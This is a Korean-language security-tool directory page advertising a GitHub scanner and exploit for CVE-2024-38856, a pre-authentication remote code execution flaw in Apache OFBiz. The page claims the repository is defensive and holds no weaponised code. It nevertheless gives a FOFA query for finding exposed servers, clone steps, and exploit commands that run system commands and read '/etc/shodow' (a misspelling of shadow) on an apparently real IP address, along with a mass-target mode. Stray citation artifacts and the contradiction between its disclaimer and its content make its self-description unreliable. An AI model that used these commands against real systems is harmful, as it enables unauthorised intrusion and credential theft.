Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-38856-Apache-OFBiz — CVE-2024-38856: Apache OFBiz 원격 코드 실행 스캐너 및 익스플로잇 | Kitploit
도구/GitHubGitHub/hex00-0x4/cve-2024-38856-apache-ofbiz
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubhex00-0x4/cve-2024-38856-apache-ofbiz

CVE-2024-38856-Apache-OFBiz

CVE-2024-38856: Apache OFBiz 원격 코드 실행 스캐너 및 익스플로잇

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
3311개월 전아직 검토되지 않음
공유

CVE-2024-38856 — Apache OFBiz (저장소 문서)

저장소 목적: CVE-2024-38856 (Apache OFBiz 잘못된 권한 부여 / 사전 인증 RCE)에 대한 정보 제공 문서.
이 저장소는 무기화된 익스플로잇 코드를 포함하지 않습니다. 방어 연구, 패치 지침, 탐지 및 안전한 실습 테스트 전용입니다.


개요

CVE-2024-38856은 Apache OFBiz의 잘못된 권한 부여 취약점으로, 인증되지 않은 사용자가 특정 엔드포인트에 접근하고 특정 조건에서 화면 렌더링 코드를 실행하여 원격 코드 실행을 가능하게 할 수 있습니다. 이 문제는 Apache OFBiz 18.12.15에서 수정되었습니다. 18.12.14까지의 이전 릴리스는 영향을 받습니다. :contentReference[oaicite:0]{index=0}

심각도/영향: 여러 보안 업체와 연구자들이 이 취약점을 치명적(critical)으로 평가했습니다. 취약한 인스턴스에서 인증되지 않은 원격 코드 실행으로 이어질 수 있으며, 실제 환경에서 활발한 악용 시도가 관찰되었습니다. 관리자는 노출된 OFBiz 인스턴스를 최우선 해결 항목으로 처리해야 합니다. :contentReference[oaicite:1]{index=1}


영향을 받는 버전

  • Apache OFBiz: 18.12.14까지 (즉, 18.12.14 이하의 모든 릴리스는 취약한 것으로 간주). 이 문제는 18.12.15에서 해결되었습니다. 업그레이드가 권장됩니다. :contentReference[oaicite:2]{index=2}

fofa : app="Apache_OFBiz" && port="8443"

스크린샷 2025-10-10 183057

익스플로잇:

git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git

cd CVE-2024-38856-Apache-OFBiz

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"

스크린샷 2025-10-10 184101

─$ python3 apache_bang.py --file target.txt -c "ls"

스크린샷 2025-10-10 075018
도구 다운로드